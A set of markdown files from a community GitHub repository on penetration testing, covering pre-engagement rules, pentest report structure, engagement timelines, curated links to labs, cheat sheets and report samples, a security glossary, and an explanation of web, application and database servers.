      Pre-approve potentially more dangerous attacks, such as password guessing.
      All other "riskier" engagement activities need approval.
      
  ### CAN THINGS GO WRONG? - answer is YES.
  
       Most commonly, systems crash on their own, and there is an increased risk with atypical traffic.
          Does it happen all the time? No
          Can it? Of course
       Never guarantee 100% uptime, because no SLAs are 100%
       And learn from mistakes (redsiege.com/askus)       
 
 ### OTHER THINGS TO PLAN (In case you have team of pentesters or running a company)
      
      Contact numbers for testers and target, including backups
      Secure communication methods
      Regular discussion times on longer tests
      For longer tests, create a follow-up template to keep up with clients.
      Advice for ORG: Always ROTATE TESTING in ORGS. 
      If you never rotate, you will go out of business almost immediately.
      
      For individual pentesters:
      Don't be afraid to approach ORGS for TESTING.
      ORGS may be looking for different testers after a certain time.


## What is the content of a well-written pentest report?
The typical penetration test report is structured in the following sections:

    1. Cover page and Vulnerability Title
    2. Info (Table of contents)
    3. Executive Summary, technical report Summary
    
    -   An executive summary should be one page or less and should highlight exciting pieces of the report's findings.
        Think of this part as marketing, and you need to get the stakeholder to buy what you are selling 
        so that they finish reading the full report.
    
    4. Mode of operating (Methodology & also include OWASP Risk Rating)
    5. A copy of the original Test Scope of Work that was signed as part of the contract. 
    -   (Company checklist as per the client's requirements, or the company's/individual's own checklist)
    
    6. Findings Summary 
    -   A summary of vulnerabilities that you found. A simple pie-chart graphic works well for this if you 
        categorize the vulnerabilities.
    7. Details of the testing team and tools that were used in the engagement
    8. Findings (Include Vulnerability Title, Vulnerability Type, POC- steps to reproduce, SS , links, impact, CVSS Score, suggestion to fix etc)
    9. Recommendations(Final Thoughts & Tips)
    10. Appendix (Appendices)
    
    Revisions (Change history after submitting the report to client)
    
## If you are bringing in clients for the organization
    
    0. As a tester, you need to understand that attackers have a near-infinite amount of time.
       No one is going to pay an infinite amount of money.
       So set a realistic duration to get optimal results.
    1. Clients may just ask you to conduct a pen test without knowing all the technical details, and still expect a good test.
       Your job is to teach them the test types and understand their requirements by asking the right questions, not to shame them.
    2. Testers need to be available for outages, questions, or external compromise.
    3. Testers must know your procurement process and know their holiday schedule!
    4. If the target doesn't improve their security posture, you have been a waste of time.
    
### IF YOU ARE THE REPORT RECIPIENT
    Ask for what you want ahead of time 
    e.g. some orgs want data in a spreadsheet or CSV, or may ask for an executive report, a developer report, etc.
    Does the sample report have the info you want or need?
    Use the pen testers! Setup a debrief call to go through the report if you need it!
    
    
## Reference : 
   ### [Pre-engagement Interactions](https://pentest-standard.readthedocs.io/en/latest/preengagement_interactions.html)
   ### Executive-Level Reporting

            Business Impact
            Customization
            Talking to the business
            Affect bottom line
            Strategic Roadmap
            Maturity model
            Appendix with terms for risk rating
    
    
   ### Technical Reporting

            Identify systemic issues and technical root cause analysis
            Maturity Model
            Technical Findings

            Description
            Screen shots
            Ensure all PII is correctly redacted
            Request/Response captures
            PoC examples
            Ensure PoC code provides benign validation of the flaw

            Reproducible Results

            Test Cases
            Fault triggers

            Incident response and monitoring capabilities

            Intelligence gathering
            Reverse IDS
            Pentest Metrics
            Vuln. Analysis
            Exploitation
            Post-exploitation
            Residual effects (notifications to 3rd parties, internally, LE, etc…)

            Common elements

            Methodology
            Objective(s)
            Scope
            Summary of findings
            Appendix with terms for risk rating
            
 ## How do you measure the results of a pentest?
        
        It depends on what the organization is looking to measure. Common things to track are the criticality of findings,
        how many issues that surfaced in the pentest actually get fixed, what types of vulnerabilities and exploits are 
        being discovered, and which new issues have been identified since the last pentest.
        
## How often should organizations have an external pentest performed?

        This answer depends on their compliance requirements, but generally, this should happen at least once a year
        and preferably on a quarterly basis. One thing you will notice when you're working as a pentester is that 
        many companies will not fix any of the issues you report, so you might come back a year later and identify the 
        same issues.

   ### A three-part video series on pen testing by Tim Medin(@timmedin)
[PART 1: THE START ](https://youtu.be/23F8QKTu86U)[Pentest process.pdf](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/files/9042034/Pentest.process.pdf)

[PART 2: THE METHOD](https://redsiege.com/pentestprocess2) [Slides](http://www.redsiege.com/wp-content/uploads/2021/03/20210309-PEN-TEST-PROCESS-P2-THE-METHOD.pdf)

[PART 3: THE REPORT](https://www.youtube.com/watch?v=oyJ0atDagco) [Slides](https://redsiege.com/pentestprocess3)



================================================
FILE: PentestingReports/Readme.md
================================================
Note: Contents inside the **RESETHACKER** are to help the community, and all
the content belongs to the respective authors and Team RESETHACKER.

1. [Pentesting Pre-Engagements Advice](#Pentesting-Pre-Engagements-Advice)
2. [Pentesting NDA & SaaS Agreement form](#Saas-Agrement-form)
3. [Pentesting Report Samples:](#Pentesting-Report-samples)
4. [Pentesting Report videos - How to write pentest Report?](#Pentesting-Videoes-How-to-write-pentest-report?)
5. [Pentesting Timelines](#Pentesting-timelines)
6. [Penetration quotation](#Penetration-quotation)


## [Pentesting Pre-Engagements Advice](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/PentestingReports/PreEngagement.md)

        ✅ Pre-engagement: 
                - Help yourself land your first pentesting client and prepare for the client meeting.

        ✅ UNDERSTAND THE TARGET:
        ✅ Understanding will help you tailor the test and test results
        ✅ WHAT IS NEEDED TO TEST?
                - TEST TYPES
        ✅ SCOPE :
        ✅ RULES OF ENGAGEMENT
                - CAN THINGS GO WRONG? - answer is YES.
                - OTHER THINGS TO PLAN (In case you have team of pentesters or running a company)
        ✅ LEGAL REQUIREMENTS FOR PENTESTING:
        ✅ Pentest report structure 
        ✅ If you are bringing in clients for the organization
                - IF YOU ARE THE REPORT RECIPIENT
        ✅ Reference : A three-part video series on pen testing by Tim Medin(@timmedin)

## Pentesting NDA & SaaS Agreement form 

- [NDA & SaaS Agreements form](https://drive.google.com/drive/folders/1dvUVNM5WnV9sFWL0BVHvJUNP44_bqhRj?usp=sharing)
- [Pentesting Agreements form](https://drive.google.com/file/d/1qA2_K5mYqYwhzKYnAJ7WPsktZ9kWlQEI/view?usp=sharing)


## Pentesting Report Samples:

Index | Pentesting Report Sample
---|---
**1** | [By Resethacker (Vikram) ](/.pdfs/FinalV1.pdf)
**2** | [Public Pentesting Reports by juliocesarfort](https://github.com/juliocesarfort/public-pentesting-reports)
**3** | [Web Application Pentesting report sample by SecurityBoat(Ninad Mathpati)](https://ninadmathpati.com/Web%20Application%20Pen%20Test%20Report.pdf)
**4** | [Public Pentesting Reports by pentestreports.com](https://pentestreports.com/reports/)

## Pentesting Videos - How to write a pentest report?

Index | Pentesting Videos
---|---
**1** | [Penetration testing - How to write pentest Report](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/PentestingReports/pentestingvideos.md)

## Pentesting Timelines
        
        Most pentesting people ask this question: "What time investment do you estimate for a penetration test?"

        The time investment for a penetration test varies from case to case depending on the systems to be tested and the individual test requirements. 
        Usually, the time needed ranges from a few days to several weeks. One goal of the preliminary meeting is to get enough information about 
        the systems to be tested to estimate the optimal length/time for the penetration test. 

Author | Pentesting Timelines
-- | --
**1** securitymetrics | [Penetration Testing Timeline](https://www.securitymetrics.com/content/dam/securitymetrics/PDF-files/Penetration_Testing_Timeline_Checklist.pdf)

  #### Penetration Testing Timeline for enterprises
              ✅1. SCHEDULING
                    2-4 Months Before Penetration Test
                
              ✅2. TESTING PREPARATION
                    5 Weeks Before Penetration Test
                
              ✅3. AUTOMATED/MANUAL TESTING
                    During Penetration Test
                
              ✅4. REPORTING
                    0-6 Weeks After Penetration Test

              ✅5. REMEDIATION
                    0-3 Months After Penetration Test
                
              ✅6. RETESTING
                    0-3 Months After Penetration Test
                
              ✅7. AFTER RETESTING
                    Ongoing



## Pentesting Quotation
Author | Pen testing Quotation
-- | --
**1** Updating Soon | [Penetration Quotation - Updating Soon]()



================================================
FILE: PentestingReports/pentestingvideos.md
================================================
Index  |  Pentest Videos
-- | --
**1** | [Pentest Reporting and Best Practices -HackerOne](https://www.youtube.com/watch?v=6QIrXgPGJhM)
**2** | [Penetration Testing Reporting -Lord Saibat](https://www.youtube.com/watch?v=6SqAXl24QaM)
**3** | [Writing a Pentest Report -The Cyber Mentor](https://youtu.be/EOoBAq6z4Zk)
**4** | [Tips for How to Create a Pen (Penetration) Testing Report - Download Report Sample](https://pentestreports.com/video/nez4sfjjwvu)
**5** | [OSCP Report Made Easy -Michael LaSalvia](https://www.youtube.com/watch?v=O9JWmF3Bgis)
**6** | [OSCP - How to Write the Report -Conda](https://www.youtube.com/watch?v=Ohm0LhFFwVA)
**7** | [Pen Test Process: The Report -Red Siege](https://www.youtube.com/watch?v=oyJ0atDagco)
**8** | [Public Penetration Test Reports - Learning Resource -LiveOverflow](https://www.youtube.com/watch?v=qNLMuls2BBA)
**9** | [Writing Reports: The Overlooked Pen Testing Skill | Pen Test HackFest Summit 2021 -SANS Offensive Operations](https://www.youtube.com/watch?v=r-6LBjlM14Y)
**10** | [Why a Pentesting Report is extremely important? -EC Council](https://www.youtube.com/watch?v=tbuU0uzU-oI)
**11** | [Pentest Report Writing Made Simple (No MS Office) -Zanidd](https://www.youtube.com/watch?v=u_-b_JIqPbs)



================================================
FILE: Pentesting_for_Researchers/PTplatform.md
================================================
## FREE LABS TO TEST YOUR PENTEST/CTF SKILLS 👩‍💻👀

Index | Websites
-- | --
- | [SANS Challenger](https://www.holidayhackchallenge.com/2021/)
- | [SmashTheStack](http://www.smashthestack.org/wargames.html)
- | [The Cryptopals Crypto Challenges](https://cryptopals.com)
- | [Try Hack Me](https://tryhackme.com)
- | [Vulnhub](https://vulnhub.com)
- | [W3Challs](https://w3challs.com)
- | [Academy Hackaflag BR](https://hackaflag.com.br)
- | [Attack-Defense](https://attackdefense.com)
- | [Alert to win](https://alf.nu/alert1)
- | [CTF Komodo Security](https://ctf.komodosec.com)
- | [CMD Challenge](https://cmdchallenge.com)
- | [Exploit Education](https://exploit.education)
- | [Google CTF](https://lnkd.in/e46drbz8)
- | [HackTheBox](https://hackthebox.com)
- | [Hackthis](https://hackthis.co.uk)
- | [Hacksplaining](https://lnkd.in/eAB5CSTA)
- | [Hacker101](https://ctf.hacker101.com)
- | [Hacker Security](https://lnkd.in/ex7R-C-e)
- | [Hacking-Lab](https://hacking-lab.com)
- | [HSTRIKE](https://hstrike.com)
- | [ImmersiveLabs](https://immersivelabs.com)
- | [NewbieContest](https://lnkd.in/ewBk6fU5)
- | [OverTheWire](http://overthewire.org)
- | [Practical Pentest Labs](https://lnkd.in/esq9Yuv5)
- | [PentesterLab](https://pentesterlab.com)
- | [Penetration Testing Practice Labs](https://lnkd.in/e6wVANYd)
- | [PentestIT LAB](https://lab.pentestit.ru)
- | [PicoCTF ](https://picoctf.com)
- | [PWNABLE](https://lnkd.in/eMEwBJzn)
- | [Root-Me](https://root-me.org)
- | [Root in Jail](http://rootinjail.com)
- | [WeChall](http://wechall.net)
- | [Zenk-Security](https://lnkd.in/ewJ5rNx2)


================================================
FILE: Pentesting_for_Researchers/Pentest-Reports.md
================================================
[FREE RESOURCES / PENTEST REPORT] - By @Gabrielle_BGB

Want to upgrade your reporting skills?
Check out these resources

👉 **Structure of a pentest report**
🌟My article on how to write a pentest report:
https://lnkd.in/eH92fT8Q

👉 **How to take notes**
🌟 Cherry Tree
https://lnkd.in/eqTjHYKi
🌟 Joplin
https://joplinapp.org/
🌟 Keepnote
http://keepnote.org/

👉 **Tips from Experts**
🌟 Writing Tips for IT Professionals by Lenny Zeltser
https://lnkd.in/eMSiEpeZ
🌟 How to write a Penetration Testing Report by HackerSploit
https://lnkd.in/ekSu5vAp

👉 **Automation**
🌟 Blackstone project by micro-joan
https://lnkd.in/eBSy58Ur
🌟 Pentext by Radically Open Security
https://lnkd.in/eNPhHHdx

👉 **Examples of reports**
🌟 A list of public pentest reports by juliocesarfort
https://lnkd.in/ebeJwVXQ
🌟 A list of bug bounty writeup on Pentester Land
https://lnkd.in/e4G9xB9A 


================================================
FILE: Pentesting_for_Researchers/Readme.md
================================================
# PEN TESTERS (Under Development)
1. Company has a PEN TESTERS team to conduct pentesting.
2. Company HIRING PEN TEST SERVICES - on an hourly basis or project basis.

- A list of [Privacy & Security Resources](https://docs.hackliberty.org/books/privacy-security/page/privacy-security-resources)

# PentestingEbook overview:

Author Pentesting | Title
-- | --
**1** | [Practical Hardware pentesting](https://t.me/freedomf0x/16886)
**2** | [Pentesting Industrial Control System](https://t.me/freedomf0x/16889)
**3** | [Network Pentesting](https://t.me/freedomf0x/12884)
**4** | [Web pentesting 1](https://t.me/freedomf0x/16879) & [Web pentesting 2](https://t.me/freedomf0x/14577)
**5** | [Pentesting Azure](https://t.me/freedomf0x/16891), [Windows Server](https://t.me/freedomf0x/15382), [PowerShell and Active Directory](https://t.me/freedomf0x/12882)

- Mobile Application Pentesting:
   - [OWASP Mobile Application Security](https://mas.owasp.org/)
   - [eLearnSecurity Mobile Application Penetration Testing (eMAPT) Notes ANDROID by Joas](https://drive.google.com/file/d/1vDPzDhGZiRXWPGZ4Yk2grBzA0ouE2KMw/view)
   - [Mobile Pentesting Roadmap](https://medium.com/@rezaduty/mobile-penetration-tester-roadmap-f2ec9bd68dcf)
   - [Mobile Application Penetration Testing Cheat Sheet](https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet)
   - [TDI 2022 - Android Application Hacking Talk](https://csbygb.gitbook.io/pentips/talks/android-app)

# Pentesting for Researchers 

Author Pentesting | Title
-- | --
**1** Vulnerabilityassessment | [Penetration Testing Framework 0.59](http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html)
**2** Elijah | [Pentesting Notes](https://github.com/dostoevskylabs/dostoevsky-pentest-notes)
**3** Chryzsh | [Beginner-Friendly Pentesting](https://chryzsh.gitbooks.io/pentestbook/content/)
**4** Pentesting Standard | [High Level Pentesting Standard](http://www.pentest-standard.org/index.php/Main_Page)
**5** Phases of Infrastructure Pentest | [All the phases of Infrastructure Pentest](https://bitvijays.github.io/index.html)
**6** Sdcampbell | [Internal Network Penetration Test Playbook ](https://github.com/sdcampbell/Internal-Pentest-Playbook)
**7** Red team/Bug Bounty Security References | [by s0cm0nkey](https://s0cm0nkey.gitbook.io/s0cm0nkeys-security-reference-guide/web-app-hacking)
**8** enaqx | [Awesome Pentest](https://github.com/enaqx/awesome-pentest)
**9** Gabrielle_BGB  | [Pentest Tips](https://github.com/CSbyGB/pentips)
**10** Wordlists | [All Wordlists](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Bugbounty/Wordlists.md)

Author | Pentesting Checklist
-- | --
**1** | [Pentesting Checklist](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/tree/main/PentestingChecklist)
**2** | [API Security Checklist](https://github.com/shieldfy/API-Security-Checklist)

Author | Pentesting Mindmap
-- | --
**1** | [Internal-Network-Pentest-MindMap](https://github.com/sdcampbell/Internal-Network-Pentest-MindMap)

Author | Pentesting Cheatsheet
-- | --
**1** | [Pentesting Cheatsheet](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/tree/main/cheetsheets)
**2** | [hausec - pentesting cheatsheet](https://hausec.com/pentesting-cheatsheet/)
**3** | [ired - offensive-security-cheatsheets](https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets)
**4** | [anhtai - beginner friendly pentesting cheatsheet](https://anhtai.me/pentesting-cheatsheet/)
**5** | [coreb1t - Collection of the cheat sheets useful for pentesting](https://github.com/coreb1t/awesome-pentest-cheat-sheets)
**6** | [Randomkeystrokes - Wifi Pentesting Command Cheatsheet](https://randomkeystrokes.com/2016/07/01/wifi-pentesting-cheatsheet/)
**7** | [NEED TO UPDATE - pentesting-with-powershell-in-six-steps](https://periciacomputacional.com/pentesting-with-powershell-in-six-steps/)


Author | Pentesting Tools
-- | --
**1** S3cur3Th1sSh1t | [Pen Testing Tools ](https://github.com/S3cur3Th1sSh1t/Pentest-Tools)

Author | Pentesting Labs
-- | --
**1** | [Practice Labs for Pentesting ](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Pentesting_for_Researchers/PTplatform.md)

## Tools
- [Oh-My-Zsh-theme-for-pentesters which includes the date, time, and IP address for pentest logging.](https://github.com/sdcampbell/lpha3cho-Oh-My-Zsh-theme-for-pentesters)

## ASK Questions related to Pentesting 

- Wednesday Offensive - REDSIEGE

30 Minutes of conversations with people around the industry with Tim Medin and the Red Siege Team. Open to everyone, questions welcome!
Join us Wednesdays in an open conversation live video chat format. No Slides, Just talk! Topics will vary depending on guests, but conversations are open to everyone. You only need to register the first time and you're set for all future Wednesday Offensive conversations. 

[Zoom Meeting ID,passcode & link:842 7796 4949, 957717](https://us02web.zoom.us/w/84277964949?tk=c9Sq_ZUmgkIXWjmc9IFvz5JElMlmba3ll1gnawypC-8.DQMAAAATn1uwlRZTVWhXZy1HZVFwQ1k2VHRPMVNMU1FRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&pwd=LTWU2D9UAWMiSBE2gNF8yk8k8S95SJ9bAT)

      Aug 10, 2022 12:30 PM

![web pentesting upderstand](https://user-images.githubusercontent.com/25515871/179118116-d376b928-f564-435b-a8c5-f38115aeb9da.png)


================================================
FILE: README.md
================================================
## Let's crowdsource our infosec learning with [ResetHacker Community](https://github.com/RESETHACKER-COMMUNITY/What-Is-RESETHACKER)

![](https://img.shields.io/github/issues/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)
![](https://img.shields.io/github/forks/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)
![](https://img.shields.io/github/stars/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)
![](https://img.shields.io/github/last-commit/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)
<p align=""> <img src="https://komarev.com/ghpvc/?username=RESETHACKER-COMMUNITY&label=Profile%20views&color=ce9927&style=flat" alt="Resources" /> </p>


Hey folks! The ResetHacker community is open to contributors, and everyone is welcome to contribute here. 


## Contributing - [Must Read me :)](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CONTRIBUTING.md)

As of writing, there are no code contributors to the main project. 
However, you can contribute learning resources, including conferences, jobs, writeups, tutorials, bug bounty helpdesk, pentesting helpdesk, how to get started, reviews of courses, etc., or by modifying the README.md or any other repository.

**We're inviting community contributors for an early-stage cybersecurity HELPDESK. This project is not limited to bug bounty or pentesting. Anyone is welcome to contribute.**

## Rules are simple to crowdsource our learning.

- Pick a topic from your domain, ADD a domain, or choose new topics that you find helpful for the community.

- If you still have questions, feel free to create an issue on GitHub. If you want to contribute to this project as a member of the team, DM me on Telegram @Attr1b or mail me at resethackerofficial@gmail.com

---

Index | Topics
---|---
**0** | [Weekly InfoSec update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/tree/main/ResetCybersecuirty)
**1** | [CVE PoC and Exploits That Matter](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md)
**2** | [BugBounty-Helpdesk](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/tree/main/Bugbounty)
**3** | [Cybersecurity Jobs-Helpdesk](https://github.com/RESETHACKER-COMMUNITY/Pentesting/blob/main/CyberSecurityJobs/Readme.md)
**4** | [CyberSecurity Conferences](https://github.com/RESETHACKER-COMMUNITY/Resources/tree/main/Conference)
**5** | [Pentesting pre-engagement, NDA form, Report samples, timeline etc](https://github.com/RESETHACKER-COMMUNITY/Pentesting/tree/main/PentestingReports)
**6** | [Pentesting for Researchers](https://github.com/RESETHACKER-COMMUNITY/Pentesting/tree/main/Pentesting_for_Researchers)


- **Contributors** 💪😎
	>Thanks a lot for spending your time helping! Keep rocking 🍻
	<!-- readme: contributors -start -->
	<table>
	<a href="https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/graphs/contributors">
  	<img src="https://contrib.rocks/image?repo=RESETHACKER-COMMUNITY/Pentesting-Bugbounty" max = {100} />
	</a>

	</table>
<p>
Note: Contents inside the **RESETHACKER** are to help the community, and all
the content belongs to the respective authors and RESETHACKER.
</p>

# Catalog for Enterprises
		
Index | Topics (Updating Soon)
---|---
**1.** | [Who conducts VAPT?]
**2.** | [Benefit of VAPT?] 
**3.** | [Purpose of VAPT?]
**4.** | [Vulnerability severity & impact analysis.]
**5.** | [Difference between VA & PT?]

# OWASP top 10 (2017 - 2021)

<img width="700" alt="OWASP top 10 mapping" src="https://user-images.githubusercontent.com/25515871/178655070-37eafa42-c714-4ef8-aa5e-eac03c1e776a.png">


# Table of Contents for Community 📚 

- [Introduction](#introduction)
  - [What is penetration testing?](#what-is-penetration-testing)
  - [Want to become a penetration tester?](#want-to-become-a-penetration-tester)
- [Some vocabulary](#some-vocabulary)
- [Difference between hacking and ethical hacking](#difference-between-hacking-and-ethical-hacking)
- [Languages](#languages)
- [Content Management Systems](#content-management-systems)
- [Basic steps of pen testing](#basic-steps-of-pen-testing)
- [Tools by category](#tools-by-category)
  - [:male_detective: Information Gathering](#male_detective-information-gathering)
  - [:lock: Password Attacks](#lock-password-attacks)
    - [:memo: Wordlists](#memo-wordlists)
  - [:globe_with_meridians: Wireless Testing](#globe_with_meridians-wireless-testing)
  - [:wrench: Exploitation Tools](#wrench-exploitation-tools)
  - [:busts_in_silhouette: Sniffing & Spoofing](#busts_in_silhouette-sniffing--spoofing)
  - [:rocket: Web Hacking](#rocket-web-hacking)
  - [:tada: Post Exploitation](#tada-post-exploitation)
  - [:package: Frameworks](#package-frameworks)
  - [Books / Manuals](#books--manuals)
  - [Discussions](#discussions)
  - [Security Advisories](#security-advisories)
- [Must Check out by Awesome resources]
- [Additional resources](#additional-resources)
- [License](#license)

(TOC made with [nGitHubTOC](https://imthenachoman.github.io/nGitHubTOC/))

# Introduction

## What is penetration testing?

Penetration testing is a type of security testing that is used to test the security of an application. It is conducted to find a security risk which might be present in a system.

If a system is not secure, then an attacker may be able to disrupt or take unauthorized control of that system. A security risk is normally an accidental error that occurs while developing and implementing software. For example, configuration errors, design errors, and software bugs, etc. [Learn more](https://www.tutorialspoint.com/penetration_testing/penetration_testing_quick_guide.htm)

## Want to become a penetration tester?

Knowing about risks on the internet and how they can be prevented is very useful, especially as a developer. Web hacking and penetration testing is the v2.0 of self-defense! But is knowing about tools and how to use them really all you need to become a pen tester? Surely not. A real penetration tester must be able to proceed rigorously and detect the weaknesses of an application. They must be able to identify the technology behind and test every single door that might be open to hackers.

This repository aims first to establish a method of reasoning about penetration testing and explain how to proceed to secure an application, and second to gather all kinds of tools and resources pen testers need. **Be sure to know the basics of programming languages and internet security before learning pen testing.**

It is also important to inform yourself about the law and what you are and are not allowed to do. Computer laws differ from country to country. First, check the laws about privacy and surveillance: [Nine eyes countries](https://en.wikipedia.org/wiki/Five_Eyes#Other_international_cooperatives), [Five eyes](https://en.wikipedia.org/wiki/Five_Eyes) and Fourteen Eyes. Always check if what you're doing is legal. Even when it's not offensive, information gathering can also be illegal!

([Table of Contents](#table-of-contents))

# Some popular domains in cybersecurity

**Infosec**: Information security, which is the practice of preventing unauthorized access, use, disclosure, disruption, modification, inspection, recording or destruction of information. The information or data may take any form, e.g. electronic or physical. Infosec can also be a person who practices ethical security. [Wikipedia](https://en.wikipedia.org/wiki/Information_security)

**Opsec**: Operations security, which is a process that identifies critical information to determine if friendly actions can be observed by enemy intelligence, determines if information obtained by adversaries could be interpreted to be useful to them, and then executes selected measures that eliminate or reduce adversary exploitation of friendly critical information. [Wikipedia](https://en.wikipedia.org/wiki/Operations_security)

**Black/grey/white hat hacker**: Someone who uses bugs or exploits to break into systems or applications. The goal and the method differ depending on whether they are a black, grey or white hat hacker. A black hat is someone malicious who does not wait for permission to break into a system or application. A white hat is *usually* a security researcher who practices ethical hacking. A grey hat sits in the middle of these two kinds of hackers; they might act maliciously if it benefits them (data breach, money, whistleblowing ...).

**Red team**: According to Wikipedia, a red team or the red team is an independent group that challenges an organization to improve its effectiveness by assuming an adversarial role or point of view. It is particularly effective in organizations with strong cultures and fixed ways of approaching problems. The United States intelligence community (military and civilian) has red teams that explore alternative futures and write articles as if they were foreign world leaders. Little formal doctrine or publications about Red Teaming in the military exist. In infosec exercises, Red teamers are playing the role of attackers. [Wikipedia](https://en.wikipedia.org/wiki/Red_team)

**Blue team**: A blue team is a group of individuals who perform an analysis of information systems to ensure security, identify security flaws, verify the effectiveness of each security measure, and to make certain all security measures will continue to be effective after implementation. As a result, blue teams were developed to design defensive measures against red team activities. In infosec exercises, Blue teamers are playing the role of defenders. [Wikipedia](https://en.wikipedia.org/wiki/Blue_team_(computer_security))

**Penetration tester**: An ethical hacker who practices security, tests applications and systems to prevent intrusions or find vulnerabilities.

**Security researcher**: Someone who practices pen testing and browses the web to find phishing/fake websites, infected servers, bugs or vulnerabilities. They can work for a company as a security consultant and are most likely a Blue teamer.

**Reverse engineering**: Reverse engineering, also called back engineering, is the process by which a man-made object is deconstructed to reveal its designs, architecture, or to extract knowledge from the object. Similar to scientific research, the only difference being that scientific research is about a natural phenomenon. [Wikipedia](https://en.wikipedia.org/wiki/Reverse_engineering)

**Social engineering**: In the context of information security, it refers to psychological manipulation of people into performing actions or divulging confidential information. A type of confidence trick for the purpose of information gathering, fraud, or system access, it differs from a traditional "con" in that it is often one of many steps in a more complex fraud scheme. The term "social engineering" as an act of psychological manipulation of a human, is also associated with the social sciences, but its usage has caught on among computer and information security professionals. [Wikipedia](https://en.wikipedia.org/wiki/Social_engineering_(security))

**Threat analyst**: A threat hunter, also called a cybersecurity threat analyst, is a security professional or managed service provider (MSP) that proactively uses manual or machine-assisted techniques to detect security incidents that may elude the grasp of automated systems. Threat hunters aim to uncover incidents that an enterprise would otherwise not find out about, providing chief information security officers (CISOs) and chief information officers (CIOs) with an additional line of defense against advanced persistent threats (APTs). [SearchCIO](https://searchcio.techtarget.com/definition/threat-hunter-cybersecurity-threat-analyst)

**site reliability engineer (SRE)**:

**Pipeline**:

**CI/CD pipeline**:

**DevOps**:

**DevSecOps**:



([Table of Contents](#table-of-contents))

## Difference between practising penetration testing and ethical hacking

A black hat is practicing penetration testing, but unlike a white hat, this is not ethical hacking. Ethical hacking is about finding vulnerabilities and improving the security of a system. An ethical hacker is the ultimate security professional. Ethical hackers know how to find and exploit vulnerabilities and weaknesses in various systems, just like a malicious hacker (a black hat hacker). In fact, they both use the same skills; however, an ethical hacker uses those skills in a legitimate, lawful manner to try to find vulnerabilities and fix them before the bad guys can try to break in. An ethical hacker is basically a white hat hacker.


##  Difference between SRE and DevOps

##  **Difference between DAST, SAST and IAST**

([Table of Contents](#table-of-contents))

# Languages

Learning programming is the very first way to start learning about security. There are a lot of languages; most people start with Python, as it is the easiest and the most popular one. PHP and Go are the least popular for writing security-related stuff, but any of these can still be used in such a context. Bash and PowerShell are mostly about scripting and writing simple CLI applications.

Since not all languages work the same way, you need to look at how they work and what you want to learn. For example, C++ and Java are compiled, while PHP and Python are interpreted languages. This definitely changes what you should use them for. Each language also has its own design patterns.

### Scripting

- Bash
- Powershell

### Software & mobile apps

- JavaScript
- Java
- Swift
- C / C++ / C#

### General purpose

- Go
- [Python](https://github.com/dloss/python-pentest-tools)
- Ruby
- Perl
- PHP

([Table of Contents](#table-of-contents))

# Content Management Systems
![image](https://user-images.githubusercontent.com/25515871/179156778-46da58f4-8531-46ee-93ef-068a9501f789.png)

These are the most used Content Management Systems (CMS). See a complete list [here](https://en.wikipedia.org/wiki/List_of_content_management_systems).

# Server

A server is a central repository, or the part of the web hosting infrastructure that hosts websites.

## **1. Web Server:**

The web server receives all the requests sent by visitors to your website and forwards only the business requests to the application server.

The static assets (CSS, JS components and web components, e.g. common images, resource files and HTML components) are served by the web server itself. Common web servers include Microsoft IIS (ASP.NET), Apache (PHP/CGI), Apache Tomcat (Servlet), Nginx, HTTPD, Jetty (Servlet) or even Python's SimpleHTTPServer. Web servers primarily respond to HTTP/HTTPS requests but are not restricted to that protocol; they may also support other protocols such as RMI/RPC.

**Front End (Web UI) <-> BackEnd (API) <-> Web server (web page and graphics files) <-> Load Balancer <-> Application Server (template pages, code & data) <-> Database (CouchDB + MySQL + Elastic DB + MongoDB + Firebase)**


## **2. Application server:**

The application server works between the web server and the database server. It generates dynamic content/assets by executing server-side code (e.g. JSP, servlet or EJB), manages services (transaction support, messaging support, etc.), processes the data (connection pooling, object pooling, etc.) and hosts the application. The application server is responsible only for business requests (login, fetching details, etc.).

Examples:

- MTS: COM+
- Email server
- WAS: EJB
- JBoss: EJB
- WebLogic Application Server: EJB
- Google Maps servers
- Google Search servers
- Google Docs servers
- Microsoft 365 servers
- Microsoft computer vision servers for AI

An application server can do whatever a web server is capable of and can respond to any number of protocols, depending on the application's business logic.

## **3. Database Server:**

The database server handles database queries and can only be accessed by the application server. Examples are MySQL, PostgreSQL, MariaDB, etc. Database servers use protocols such as ODBC, JDBC, etc.

**Please note:**

- A web server is designed to serve static HTTP content such as HTML and images; for dynamic content it has plugins that support scripting languages like Perl, PHP, ASP, JSP, etc.

- A web container is a part of the web server, and the web server is a part of the application server.

- A web server in Java is also known as a web container or a servlet container, which has a limited set of Java EE features such as Servlets and JSP. Example: Apache Tomcat.

- An application server has a web container in it as well as full Java EE features such as Java Mail Service, JPA and JSF. Examples: GlassFish, Apache TomEE, JBoss or WildFly (new name), IBM WebSphere, etc.

- If you have a Java application with just JSP and Servlets to generate dynamic content, then you need a web container like Apache Tomcat or Jetty. If you have a Java EE application using EJB, distributed transactions, messaging and other fancy features, then you need a full-fledged application server like JBoss, WebSphere or Oracle's WebLogic.

- The load balancer distributes the load between multiple application servers.

- The application server can only be accessed via the web server, and the database server can only be accessed by the application server.

- If you want to cover the web server and application server roles with one server, I would recommend VPS hosting servers and dedicated hosting servers, because they host volumes of web projects and applications with a higher uptime.

From <https://www.quora.com/Whats-the-diference-between-an-application-server-and-a-web-server> 
